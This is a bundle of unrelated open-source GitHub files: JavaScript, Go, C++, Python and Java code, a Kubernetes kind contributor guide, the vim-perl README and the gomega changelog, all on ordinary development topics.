_uninstallRootEventHandler: function(root)
{
root.removeEventListener('change', this.reactChemObjChange, this);
},
/** @private */
reactChemObjChange: function(e)
{
if (this.getEnableLiveUpdate())
{
if (this.isLiveUpdatePaused())
{
if (this.getObjMap().get(e.target))
Kekule.ArrayUtils.pushUnique(this._changedObjects, e.target);
}
else
{
this.refreshObject(e.target);
}
}
},
/**
* Refresh tree item on chemObj.
* @param {Kekule.ChemObject} chemObj
*/
refreshObject: function(chemObj)
{
// get corresponding tree node
var treeItem = this.getObjMap().get(chemObj);
if (treeItem)
{
this._updateTreeItem(treeItem, chemObj);
}
return this;
},
/**
* Fill tree with rootObj data.
* @param {Kekule.ChemObject} rootObj
* @private
*/
_fillTree: function(rootObj)
{
if (rootObj)
{
this.clearChildItems();
this._updateTreeItem(this.appendChildItem(), rootObj);
}
},
/**
* Update tree item properties according to chemObj data.
* @param {HTMLElement} treeItem
* @param {Kekule.ChemObject} chemObj
* @private
*/
_updateTreeItem: function(treeItem, chemObj)
{
//console.log('update tree', chemObj.getClassName());
var title = this._getChemObjDisplayTitle(chemObj);
var data = {'text': title, 'obj': chemObj};
this.setItemData(treeItem, data);
this.getObjMap().set(chemObj, treeItem);
//this.clearChildItems(treeItem);
var oldChildItemCount = this.getChildItemCount(treeItem);
var l = chemObj.getChildCount();
for (var i = 0; i < l; ++i)
{
var child = chemObj.getChildAt(i);
/*
if (!child.isSelectable())
continue;
*/
//var childItem = this.appendChildItem(treeItem);
var childItem;
if (i < oldChildItemCount)
childItem = this.getChildItemAt(treeItem, i);
else
childItem = this.appendChildItem(treeItem);
this._updateTreeItem(childItem, child);
}
// remove extra tree nodes
if (oldChildItemCount > l)
{
for (var i = oldChildItemCount - 1; i >= l; --i)
{
this.removeChildItemAt(treeItem, i);
}
}
},
/** @private */
_getChemObjDisplayTitle: function(chemObj)
{
var result = '';
var id = chemObj.getId();
if (id)
result += '<span class="' + CCNS.CHEM_STRUCT_TREE_VIEW_ITEM_TITLE + '">' + id + '</span>';
var className = chemObj.getClassName();
// get last part of className
var cnameParts = className.split('.');
var cname = cnameParts.length? cnameParts[cnameParts.length - 1]: className;
var stype = '<span class="' + CCNS.CHEM_STRUCT_TREE_VIEW_ITEM_TYPE + '">(' + cname + ')</span>';
//return result + '(' + cname + ')';
return result + stype;
},
/**
* Make tree items corresponding to chemObjs to be selected.
* @param {Array} chemObjs
*/
selectChemObjs: function(chemObjs)
{
var items = [];
for (var i = 0, l = chemObjs.length; i < l; ++i)
{
var obj = chemObjs[i];
var item = this.getObjMap().get(obj);
if (item)
items.push(item);
}
this.select(items);
return this;
},
/**
* Returns corresponding chemObjs linked to selected tree items.
* @returns {Array}
*/
getSelectedChemObjs: function()
{
var result = [];
var items = this.getSelection();
if (items && items.length)
{
for (var i = 0, l = items.length; i < l; ++i)
{
var data = this.getItemData(items[i]);
if (data && data.obj)
result.push(data.obj);
}
}
return result;
}
});
})(); | {
"pile_set_name": "Github"
} |
---
title: "Getting Started"
menu:
main:
parent: "contributing"
identifier: "getting started"
weight: 1
---
# Getting Started
Welcome! This guide covers how to get started contributing to kind.
## 1. Read the Kubernetes community guidelines
Make sure to read you read the [Kubernetes community guidelines][community].
In specific, read through the [Kubernetes contributor guidelines][contributor].
Additionally, note that kind is developed on [GitHub][github] and will require
an account to contribute.
## 2. Install Tools
### Install git
Our source code is managed with [`git`][git], to develop locally you
will need to install `git`.
You can check if `git` is already on your system and properly installed with
the following command:
```
git --version
```
### Install Hugo
If you wish to contribute to the documentation, it is recommended but not
required to install [hugo], which we use to develop this site.
Please see: https://gohugo.io/getting-started/installing/
### Install Go
To work on kind's codebase you will need [Go][golang].
Install or upgrade [Go using the instructions for your operating system][golang].
You can check if Go is in your system with the following command:
```
go version
```
Preferably Go `1.13` or greater should be installed.
Correct automatic formatting of the source with `gofmt` requires at least
`1.11.0`.
Working with Go [modules] (which we use for dependency management) requires at
least `1.11.4` due to checksum bugs in lower versions.
### Install Docker
Currently, to create clusters you will need to install [Docker][docker].
If you haven't already, [install Docker][install docker], following the
[official instructions][install docker].
If you have an existing installation, check your version and make sure you have
the latest Docker.
To check if `docker` has been installed:
```
docker --version
```
This documentation is written using Docker version 18.09.2.
## 3. Read The Docs
The [design principles], [1.0 roadmap], [project structure], and [initial design]
may be helpful to review before contributing.
## 4. Reaching Out
Issues are tracked on GitHub. Please check [the issue tracker][issues] to see
if there is any existing discussion or work related to your interests.
If you do not see anything, please [file a new issue][file an issue].
Please reach out for bugs, feature requests, and other issues!
The maintainers of this project are reachable via:
- [Kubernetes Slack] in the [#kind] channel
- [filing an issue][file an issue]
- The Kubernetes [SIG-Testing Mailing List]
Current maintainers are [@BenTheElder] and [@munnerz] - feel free to
reach out if you have any questions!
See also: the Kubernetes [community page].
[git]: https://git-scm.com/
[hugo]: https://gohugo.io
[issues]: https://github.com/kubernetes-sigs/kind/issues
[file an issue]: https://github.com/kubernetes-sigs/kind/issues/new
[design principles]: /docs/design/principles
[1.0 roadmap]: /docs/contributing/1.0-roadmap
[project scope]: /docs/contributing/project-scope
[project structure]: /docs/contributing/project-structure
[initial design]: /docs/design/initial
[github]: https://github.com/
[golang]: https://golang.org/doc/install
[docker]: https://www.docker.com/
[install docker]: https://docs.docker.com/install/#supported-platforms
[community]: https://github.com/kubernetes/community
[contributor]: https://github.com/kubernetes/community/blob/master/contributors/guide/README.md
[Kubernetes Slack]: http://slack.k8s.io/
[#kind]: https://kubernetes.slack.com/messages/CEKK1KTN2/
[@BenTheElder]: https://github.com/BenTheElder
[@munnerz]: https://github.com/munnerz
[community page]: http://kubernetes.io/community/
[modules]: https://github.com/golang/go/wiki/Modules
[SIG-Testing Mailing List]: https://groups.google.com/forum/#!forum/kubernetes-sig-testing
| {
"pile_set_name": "Github"
} |
package request
import (
"time"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
)
// Retryer is an interface to control retry logic for a given service.
// The default implementation used by most services is the client.DefaultRetryer
// structure, which contains basic retry logic using exponential backoff.
type Retryer interface {
RetryRules(*Request) time.Duration
ShouldRetry(*Request) bool
MaxRetries() int
}
// WithRetryer sets a config Retryer value to the given Config returning it
// for chaining.
func WithRetryer(cfg *aws.Config, retryer Retryer) *aws.Config {
cfg.Retryer = retryer
return cfg
}
// retryableCodes is a collection of service response codes which are retry-able
// without any further action.
var retryableCodes = map[string]struct{}{
"RequestError": {},
"RequestTimeout": {},
ErrCodeResponseTimeout: {},
"RequestTimeoutException": {}, // Glacier's flavor of RequestTimeout
}
var throttleCodes = map[string]struct{}{
"ProvisionedThroughputExceededException": {},
"Throttling": {},
"ThrottlingException": {},
"RequestLimitExceeded": {},
"RequestThrottled": {},
"TooManyRequestsException": {}, // Lambda functions
"PriorRequestNotComplete": {}, // Route53
}
// credsExpiredCodes is a collection of error codes which signify the credentials
// need to be refreshed. Expired tokens require refreshing of credentials, and
// resigning before the request can be retried.
var credsExpiredCodes = map[string]struct{}{
"ExpiredToken": {},
"ExpiredTokenException": {},
"RequestExpired": {}, // EC2 Only
}
func isCodeThrottle(code string) bool {
_, ok := throttleCodes[code]
return ok
}
func isCodeRetryable(code string) bool {
if _, ok := retryableCodes[code]; ok {
return true
}
return isCodeExpiredCreds(code)
}
func isCodeExpiredCreds(code string) bool {
_, ok := credsExpiredCodes[code]
return ok
}
var validParentCodes = map[string]struct{}{
ErrCodeSerialization: {},
ErrCodeRead: {},
}
type temporaryError interface {
Temporary() bool
}
func isNestedErrorRetryable(parentErr awserr.Error) bool {
if parentErr == nil {
return false
}
if _, ok := validParentCodes[parentErr.Code()]; !ok {
return false
}
err := parentErr.OrigErr()
if err == nil {
return false
}
if aerr, ok := err.(awserr.Error); ok {
return isCodeRetryable(aerr.Code())
}
if t, ok := err.(temporaryError); ok {
return t.Temporary()
}
return isErrConnectionReset(err)
}
// IsErrorRetryable returns whether the error is retryable, based on its Code.
// Returns false if error is nil.
func IsErrorRetryable(err error) bool {
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
return isCodeRetryable(aerr.Code()) || isNestedErrorRetryable(aerr)
}
}
return false
}
// IsErrorThrottle returns whether the error is to be throttled based on its code.
// Returns false if error is nil.
func IsErrorThrottle(err error) bool {
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
return isCodeThrottle(aerr.Code())
}
}
return false
}
// IsErrorExpiredCreds returns whether the error code is a credential expiry error.
// Returns false if error is nil.
func IsErrorExpiredCreds(err error) bool {
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
return isCodeExpiredCreds(aerr.Code())
}
}
return false
}
// IsErrorRetryable returns whether the error is retryable, based on its Code.
// Returns false if the request has no Error set.
//
// Alias for the utility function IsErrorRetryable
func (r *Request) IsErrorRetryable() bool {
return IsErrorRetryable(r.Error)
}
// IsErrorThrottle returns whether the error is to be throttled based on its code.
// Returns false if the request has no Error set
//
// Alias for the utility function IsErrorThrottle
func (r *Request) IsErrorThrottle() bool {
return IsErrorThrottle(r.Error)
}
// IsErrorExpired returns whether the error code is a credential expiry error.
// Returns false if the request has no Error set.
//
// Alias for the utility function IsErrorExpiredCreds
func (r *Request) IsErrorExpired() bool {
return IsErrorExpiredCreds(r.Error)
}
| {
"pile_set_name": "Github"
} |
# vim-perl
[](https://travis-ci.org/vim-perl/vim-perl)
This is the aggregation of all the various Perl-related syntax and
helper files for Perl 5.
For Perl 6 files, please see [vim-perl6](https://github.com/vim-perl/vim-perl6).
# Installation
You can install vim-perl using
* [Pathogen](https://github.com/tpope/vim-pathogen) and git submodules
* [Vundle](https://github.com/gmarik/vundle)
* [VAM](https://github.com/MarcWeber/vim-addon-manager)
* [vim-plug](https://github.com/junegunn/vim-plug)
They were all tested and work: please read the related documentation on the related sites.
The legacy method is to install just do a "make install" and you'll get the
.vim files all installed in your `~/.vim` directory.
## Installing using [vim-plug](https://github.com/junegunn/vim-plug)
In your `.vimrc`:
call plug#begin('~/.vim/plugged')
Plug 'vim-perl/vim-perl', { 'for': 'perl', 'do': 'make clean carp dancer highlight-all-pragmas moose test-more try-tiny' }
call plug#end()
Re-source your configuration, do `PlugInstall`, and you're done.
The `do` argument is optional, and can be used
if you want to enable any of the optional sub-syntaxes.
The `perl` argument is also optional, and only required if you want to
lazy-load the plugin only if dealing with Perl files.
# Getting Help
Any bug reports/feature requests/patches should be directed to the [vim-perl group](https://groups.google.com/group/vim-perl).
When reporting bugs in the highlighting of items, please include an example file as well
as a screenshot demonstrating the problem.
# FAQ
## Can you add highlighting for Moose, Try::Tiny, Test::More, SQL in strings, etc?
We have syntax "extensions" under the `contrib/` directory; you can find custom highlighting
for these sorts of things there. To enable any of them, just drop the relevant
file in a `after/syntax/perl` directory visible to vim.
$ cp contrib/dancer.vim ~/.vim/after/syntax/perl/
You can also populate the local `after/syntax/perl/` via `make`:
$ make dancer moose
$ ls after/syntax/perl
dancer.vim moose.vim
## Curly braces inside of regexes/strings are considered when I use %
(See also [GH #86](https://github.com/vim-perl/vim-perl/issues/86))
Vim itself only considers double quotes in this scenario; the matchit plugin, however,
can deal with this scenario and vim-perl's files are set up to work with it should you
choose to use it.
| {
"pile_set_name": "Github"
} |
// +build !ignore_autogenerated
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by deepcopy-gen. DO NOT EDIT.
package v1
import (
corev1 "k8s.io/api/core/v1"
runtime "k8s.io/apimachinery/pkg/runtime"
)
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *StorageClass) DeepCopyInto(out *StorageClass) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
if in.Parameters != nil {
in, out := &in.Parameters, &out.Parameters
*out = make(map[string]string, len(*in))
for key, val := range *in {
(*out)[key] = val
}
}
if in.ReclaimPolicy != nil {
in, out := &in.ReclaimPolicy, &out.ReclaimPolicy
*out = new(corev1.PersistentVolumeReclaimPolicy)
**out = **in
}
if in.MountOptions != nil {
in, out := &in.MountOptions, &out.MountOptions
*out = make([]string, len(*in))
copy(*out, *in)
}
if in.AllowVolumeExpansion != nil {
in, out := &in.AllowVolumeExpansion, &out.AllowVolumeExpansion
*out = new(bool)
**out = **in
}
if in.VolumeBindingMode != nil {
in, out := &in.VolumeBindingMode, &out.VolumeBindingMode
*out = new(VolumeBindingMode)
**out = **in
}
if in.AllowedTopologies != nil {
in, out := &in.AllowedTopologies, &out.AllowedTopologies
*out = make([]corev1.TopologySelectorTerm, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new StorageClass.
func (in *StorageClass) DeepCopy() *StorageClass {
if in == nil {
return nil
}
out := new(StorageClass)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *StorageClass) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *StorageClassList) DeepCopyInto(out *StorageClassList) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ListMeta.DeepCopyInto(&out.ListMeta)
if in.Items != nil {
in, out := &in.Items, &out.Items
*out = make([]StorageClass, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new StorageClassList.
func (in *StorageClassList) DeepCopy() *StorageClassList {
if in == nil {
return nil
}
out := new(StorageClassList)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *StorageClassList) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachment) DeepCopyInto(out *VolumeAttachment) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ObjectMeta.DeepCopyInto(&out.ObjectMeta)
in.Spec.DeepCopyInto(&out.Spec)
in.Status.DeepCopyInto(&out.Status)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachment.
func (in *VolumeAttachment) DeepCopy() *VolumeAttachment {
if in == nil {
return nil
}
out := new(VolumeAttachment)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *VolumeAttachment) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentList) DeepCopyInto(out *VolumeAttachmentList) {
*out = *in
out.TypeMeta = in.TypeMeta
in.ListMeta.DeepCopyInto(&out.ListMeta)
if in.Items != nil {
in, out := &in.Items, &out.Items
*out = make([]VolumeAttachment, len(*in))
for i := range *in {
(*in)[i].DeepCopyInto(&(*out)[i])
}
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentList.
func (in *VolumeAttachmentList) DeepCopy() *VolumeAttachmentList {
if in == nil {
return nil
}
out := new(VolumeAttachmentList)
in.DeepCopyInto(out)
return out
}
// DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object.
func (in *VolumeAttachmentList) DeepCopyObject() runtime.Object {
if c := in.DeepCopy(); c != nil {
return c
}
return nil
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentSource) DeepCopyInto(out *VolumeAttachmentSource) {
*out = *in
if in.PersistentVolumeName != nil {
in, out := &in.PersistentVolumeName, &out.PersistentVolumeName
*out = new(string)
**out = **in
}
if in.InlineVolumeSpec != nil {
in, out := &in.InlineVolumeSpec, &out.InlineVolumeSpec
*out = new(corev1.PersistentVolumeSpec)
(*in).DeepCopyInto(*out)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentSource.
func (in *VolumeAttachmentSource) DeepCopy() *VolumeAttachmentSource {
if in == nil {
return nil
}
out := new(VolumeAttachmentSource)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentSpec) DeepCopyInto(out *VolumeAttachmentSpec) {
*out = *in
in.Source.DeepCopyInto(&out.Source)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentSpec.
func (in *VolumeAttachmentSpec) DeepCopy() *VolumeAttachmentSpec {
if in == nil {
return nil
}
out := new(VolumeAttachmentSpec)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeAttachmentStatus) DeepCopyInto(out *VolumeAttachmentStatus) {
*out = *in
if in.AttachmentMetadata != nil {
in, out := &in.AttachmentMetadata, &out.AttachmentMetadata
*out = make(map[string]string, len(*in))
for key, val := range *in {
(*out)[key] = val
}
}
if in.AttachError != nil {
in, out := &in.AttachError, &out.AttachError
*out = new(VolumeError)
(*in).DeepCopyInto(*out)
}
if in.DetachError != nil {
in, out := &in.DetachError, &out.DetachError
*out = new(VolumeError)
(*in).DeepCopyInto(*out)
}
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeAttachmentStatus.
func (in *VolumeAttachmentStatus) DeepCopy() *VolumeAttachmentStatus {
if in == nil {
return nil
}
out := new(VolumeAttachmentStatus)
in.DeepCopyInto(out)
return out
}
// DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil.
func (in *VolumeError) DeepCopyInto(out *VolumeError) {
*out = *in
in.Time.DeepCopyInto(&out.Time)
return
}
// DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new VolumeError.
func (in *VolumeError) DeepCopy() *VolumeError {
if in == nil {
return nil
}
out := new(VolumeError)
in.DeepCopyInto(out)
return out
}
| {
"pile_set_name": "Github"
} |
//-------------------------------------------------------------------------------------------------------
// Copyright (C) Microsoft. All rights reserved.
// Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
//-------------------------------------------------------------------------------------------------------
#pragma once
/**
* The object that handles actions generated by a SwitchIRBuilder, which
* will be either an IRBuilder or an IRBuilderAsmJs
*/
struct SwitchAdapter {
virtual void AddBranchInstr(IR::BranchInstr * instr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false) = 0;
virtual void AddInstr(IR::Instr * instr, uint32 offset) = 0;
virtual void CreateRelocRecord(IR::BranchInstr * branchInstr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false) = 0;
virtual void ConvertToBailOut(IR::Instr * instr, IR::BailOutKind kind) = 0;
};
/**
* Handles delegating actions generated by a SwitchIRBuilder to an IRBuilder
*/
struct IRBuilderSwitchAdapter : public SwitchAdapter {
private:
IRBuilder * m_builder;
public:
IRBuilderSwitchAdapter(IRBuilder * builder)
: m_builder(builder) {}
virtual void AddBranchInstr(IR::BranchInstr * instr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void AddInstr(IR::Instr * instr, uint32 offset);
virtual void CreateRelocRecord(IR::BranchInstr * branchInstr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void ConvertToBailOut(IR::Instr * instr, IR::BailOutKind kind);
};
/**
* Handles delegating actions generated by a SwitchIRBuilder to an IRBuilderAsmJs
*/
#ifdef ASMJS_PLAT
struct IRBuilderAsmJsSwitchAdapter : public SwitchAdapter {
private:
IRBuilderAsmJs * m_builder;
public:
IRBuilderAsmJsSwitchAdapter(IRBuilderAsmJs * builder)
: m_builder(builder) {}
virtual void AddBranchInstr(IR::BranchInstr * instr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void AddInstr(IR::Instr * instr, uint32 offset);
virtual void CreateRelocRecord(IR::BranchInstr * branchInstr, uint32 offset, uint32 targetOffset, bool clearBackEdge = false);
virtual void ConvertToBailOut(IR::Instr * instr, IR::BailOutKind kind);
};
#endif
/**
* Handles construction of switch statements, with appropriate optimizations. Note that some of these
* optimizations occur during IR building (rather than GlobOpt) because the abstraction of a switch/case
* block is not maintained with the resulting IR. Thus, some optimizations must occur during this phase.
*/
class SwitchIRBuilder {
private:
typedef JsUtil::List<CaseNode*, JitArenaAllocator> CaseNodeList;
typedef JsUtil::List<JITJavascriptString *, JitArenaAllocator> StrSwitchCaseList;
SwitchAdapter* m_adapter;
Func* m_func;
JitArenaAllocator* m_tempAlloc;
CaseNodeList* m_caseNodes;
bool m_seenOnlySingleCharStrCaseNodes;
IR::Instr * m_profiledSwitchInstr;
bool m_isAsmJs;
bool m_switchOptBuildBail; //bool refers to whether the bail out has to be generated or not
bool m_switchIntDynProfile; // bool refers to whether dynamic profile info says that the switch expression is an integer or not
bool m_switchStrDynProfile; // bool refers to whether dynamic profile info says that the switch expression is a string or not
BVSparse<JitArenaAllocator> * m_intConstSwitchCases;
StrSwitchCaseList * m_strConstSwitchCases;
Js::OpCode m_eqOp;
Js::OpCode m_ltOp;
Js::OpCode m_leOp;
Js::OpCode m_gtOp;
Js::OpCode m_geOp;
Js::OpCode m_subOp;
public:
SwitchIRBuilder(SwitchAdapter * adapter)
: m_adapter(adapter)
, m_profiledSwitchInstr(nullptr)
, m_switchOptBuildBail(false)
, m_switchIntDynProfile(false)
, m_switchStrDynProfile(false)
, m_isAsmJs(false)
, m_seenOnlySingleCharStrCaseNodes(true) {}
void Init(Func * func, JitArenaAllocator * tempAlloc, bool isAsmJs);
void BeginSwitch();
void EndSwitch(uint32 offset, uint32 targetOffset);
void SetProfiledInstruction(IR::Instr * instr, Js::ProfileId profileId);
void OnCase(IR::RegOpnd * src1Opnd, IR::Opnd * src2Opnd, uint32 offset, uint32 targetOffset);
void FlushCases(uint32 targetOffset);
void RefineCaseNodes();
void ResetCaseNodes();
void BuildCaseBrInstr(uint32 targetOffset);
void BuildBinaryTraverseInstr(int start, int end, uint32 defaultLeafBranch);
void BuildLinearTraverseInstr(int start, int end, uint32 defaultLeafBranch);
void BuildEmptyCasesInstr(CaseNode* currCaseNode, uint32 defaultLeafBranch);
void BuildOptimizedIntegerCaseInstrs(uint32 targetOffset);
void BuildMultiBrCaseInstrForStrings(uint32 targetOffset);
void FixUpMultiBrJumpTable(IR::MultiBranchInstr * multiBranchInstr, uint32 targetOffset);
void TryBuildBinaryTreeOrMultiBrForSwitchInts(IR::MultiBranchInstr * &multiBranchInstr, uint32 fallthrOffset,
int startjmpTableIndex, int endjmpTableIndex, int startBinaryTravIndex, uint32 targetOffset);
bool TestAndAddStringCaseConst(JITJavascriptString * str);
void BuildBailOnNotInteger();
void BuildBailOnNotString();
IR::MultiBranchInstr * BuildMultiBrCaseInstrForInts(uint32 start, uint32 end, uint32 targetOffset);
};
| {
"pile_set_name": "Github"
} |
"""
Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
SPDX-License-Identifier: MIT-0
"""
import six
from cfnlint.rules import CloudFormationLintRule
from cfnlint.rules import RuleMatch
class AuroraDBInstanceProperties(CloudFormationLintRule):
"""Aurora DB instances have a lot properties that can't be set and vice and versa"""
id = 'E3029'
shortdesc = 'Aurora instances don\'t require certain properties'
description = 'Certain properties are not reuqired when using the Aurora engine for AWS::RDS::DBInstance'
source_url = 'https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-rds-database-instance.html'
tags = ['resources', 'rds']
aurora_not_required_props = [
'AllocatedStorage',
'BackupRetentionPeriod',
'CopyTagsToSnapshot',
'DeletionProtection',
'EnableIAMDatabaseAuthentication',
'MasterUserPassword',
'StorageEncrypted',
]
aurora_engines = [
'aurora',
'aurora-mysql',
'aurora-postgresql',
]
def __init__(self):
"""Init"""
super(AuroraDBInstanceProperties, self).__init__()
self.resource_property_types = ['AWS::RDS::DBInstance']
def check(self, properties, path, cfn):
"""Check itself"""
matches = []
property_sets = cfn.get_object_without_conditions(
properties, ['Engine'] + self.aurora_not_required_props)
for property_set in property_sets:
properties = property_set.get('Object')
scenario = property_set.get('Scenario')
engine_sets = properties.get_safe('Engine', type_t=six.string_types)
for engine, _ in engine_sets:
if engine in self.aurora_engines:
for prop in properties:
if prop in self.aurora_not_required_props:
path_prop = path[:] + [prop]
message = 'You cannot specify {} for Aurora AWS::RDS::DBInstance at {}'
if scenario is None:
matches.append(
RuleMatch(path_prop, message.format(prop, '/'.join(map(str, path_prop)))))
else:
scenario_text = ' and '.join(
['when condition "%s" is %s' % (k, v) for (k, v) in scenario.items()])
matches.append(
RuleMatch(path_prop, message.format(prop, '/'.join(map(str, path_prop)) + ' ' + scenario_text)))
return matches
def match_resource_properties(self, properties, _, path, cfn):
"""Match for sub properties"""
matches = []
matches.extend(self.check(properties, path, cfn))
return matches
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2011-2019, Peter Abeles. All Rights Reserved.
*
* This file is part of BoofCV (http://boofcv.org).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package boofcv.alg.interpolate;
import boofcv.alg.misc.GImageMiscOps;
import boofcv.concurrency.BoofConcurrency;
import boofcv.factory.interpolate.FactoryInterpolation;
import boofcv.struct.border.BorderType;
import boofcv.struct.image.GrayF32;
import org.openjdk.jmh.annotations.*;
import java.util.Random;
import java.util.concurrent.TimeUnit;
/**
* Benchmark for interpolating on a per-pixel basis
*
* @author Peter Abeles
*/
@BenchmarkMode(Mode.AverageTime)
@OutputTimeUnit(TimeUnit.MILLISECONDS)
@Warmup(iterations = 2)
@Measurement(iterations = 5)
@State(Scope.Benchmark)
@Fork(value=1)
public class BenchmarkInterpolatePixel {
@Param({"true","false"})
public boolean concurrent;
// @Param({"100", "500", "1000", "5000", "10000"})
@Param({"5000"})
public int size;
GrayF32 inputF32 = new GrayF32(size, size);
GrayF32 outputF32 = new GrayF32(size, size);
// defines the region its interpolation
static float start = 10.1f;
static float end = 310.1f;
static float step = 1f;
InterpolatePixelS<GrayF32> bilinear_sb;
InterpolatePixelS<GrayF32> nearest_sb;
@Setup
public void setup() {
BoofConcurrency.USE_CONCURRENT = concurrent;
Random rand = new Random(234);
inputF32.reshape(size,size);
outputF32.reshape(size,size);
GImageMiscOps.fillUniform(inputF32,rand,0,200);
bilinear_sb = FactoryInterpolation.bilinearPixelS(GrayF32.class, BorderType.EXTENDED);
nearest_sb = FactoryInterpolation.nearestNeighborPixelS(GrayF32.class);
}
@Benchmark
public void bilinear_F32() {
for (float x = start; x <= end; x += step)
for (float y = start; y <= end; y += step)
bilinear_sb.get(x, y);
}
@Benchmark
public void nn_F32() {
for (float x = start; x <= end; x += step)
for (float y = start; y <= end; y += step)
nearest_sb.get(x, y);
}
}
| {
"pile_set_name": "Github"
} |
require({
"baseUrl": "./scripts/",
"paths": {
"jquery": "http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.4.min"
//"jquery": "http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min"
},
priority: ['jquery']
});
define(["jquery.gamma", "jquery.epsilon"], function() {
$(function () {
doh.is('epsilon', $('body').epsilon());
doh.is('epsilon', $('body').epsilon());
readyFired();
});
});
| {
"pile_set_name": "Github"
} |
## 1.10.1
### Fixes
- Update dependencies (#389) [9f5eecd]
## 1.10.0
### Features
- Add HaveHTTPStatusMatcher (#378) [f335c94]
- Changed matcher for content-type in VerifyJSONRepresenting (#377) [6024f5b]
- Make ghttp usable with x-unit style tests (#376) [c0be499]
- Implement PanicWith matcher (#381) [f8032b4]
## 1.9.0
### Features
- Add ContainElements matcher (#370) [2f57380]
- Output missing and extra elements in ConsistOf failure message [a31eda7]
- Document method LargestMatching [7c5a280]
## 1.8.1
### Fixes
- Fix unexpected MatchError() behaviour (#375) [8ae7b2f]
## 1.8.0
### Features
- Allow optional description to be lazily evaluated function (#364) [bf64010]
- Support wrapped errors (#359) [0a981cb]
## 1.7.1
### Fixes
- Bump go-yaml version to cover fixed ddos heuristic (#362) [95e431e]
## 1.7.0
### Features
- export format property variables (#347) [642e5ba]
### Fixes
- minor fix in the documentation of ExpectWithOffset (#358) [beea727]
## 1.6.0
### Features
- Display special chars on error [41e1b26]
- Add BeElementOf matcher [6a48b48]
### Fixes
- Remove duplication in XML matcher tests [cc1a6cb]
- Remove unnecessary conversions (#357) [7bf756a]
- Fixed import order (#353) [2e3b965]
- Added missing error handling in test (#355) [c98d3eb]
- Simplify code (#356) [0001ed9]
- Simplify code (#354) [0d9100e]
- Fixed typos (#352) [3f647c4]
- Add failure message tests to BeElementOf matcher [efe19c3]
- Update go-testcov untested sections [37ee382]
- Mark all uncovered files so go-testcov ./... works [53b150e]
- Reenable gotip in travis [5c249dc]
- Fix the typo of comment (#345) [f0e010e]
- Optimize contain_element_matcher [abeb93d]
## 1.5.0
### Features
- Added MatchKeys matchers [8b909fc]
### Fixes and Minor Improvements
- Add type aliases to remove stuttering [03b0461]
- Don't run session_test.go on windows (#324) [5533ce8]
